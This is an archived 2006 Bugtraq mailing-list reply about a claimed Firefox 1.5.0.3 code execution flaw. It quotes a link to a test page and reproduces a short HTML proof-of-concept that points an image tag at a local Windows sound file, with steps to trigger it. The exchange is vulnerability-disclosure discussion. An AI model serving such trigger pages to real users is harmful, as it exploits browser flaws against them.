Re: Firefox 1.5.0.3 code execution exploit

To: "yesn@xxxxxxxx" <yesn@xxxxxxxx>
Subject: Re: Firefox 1.5.0.3 code execution exploit
From: James_gmail-ij <ij3n0spam@xxxxxxxxx>
Date: Sun, 7 May 2006 00:16:23 +0100
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=EPXzePqqsHGvrxPCFfzyWmAvSPolGo9dfprRxcJgVkYTmktIJxXiMiZCwK4P1yhisck3lpz/biblLUmWfsuxl149WKenEPkYBBimDj/VQyfrnbMsAP3GoEKrMcqXEKL1vrxS+xVmYTNOOwpXR162CgbiLyaO7yhfPJkqKOMxFvg=
In-reply-to: <20060505095142.13931.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20060505095142.13931.qmail@xxxxxxxxxxxxxxxxx>

On 5 May 2006 09:51:42 -0000, yesn@xxxxxxxx <yesn@xxxxxxxx> wrote:

try this with Firefox 1.5.0.3

»www.gavinsharp.com/tmp/ImageVuln.html


Windows Only - Yes?

<Head>
<Title>Bug 334341</Title>
</Head>

<Body>
<Img src="C:\WINDOWS\Media\ringin.wav"> right click the image and
select "View Image"
</Body>

References:
- Firefox 1.5.0.3 code execution exploit
  - From: yesn

Prev by Date: Oracle - the last word
Next by Date: Re: tseekdir.cgi<--Local File Include
Previous by thread: Firefox 1.5.0.3 code execution exploit
Next by thread: Re: Firefox 1.5.0.3 code execution exploit
Index(es):
- Date
- Thread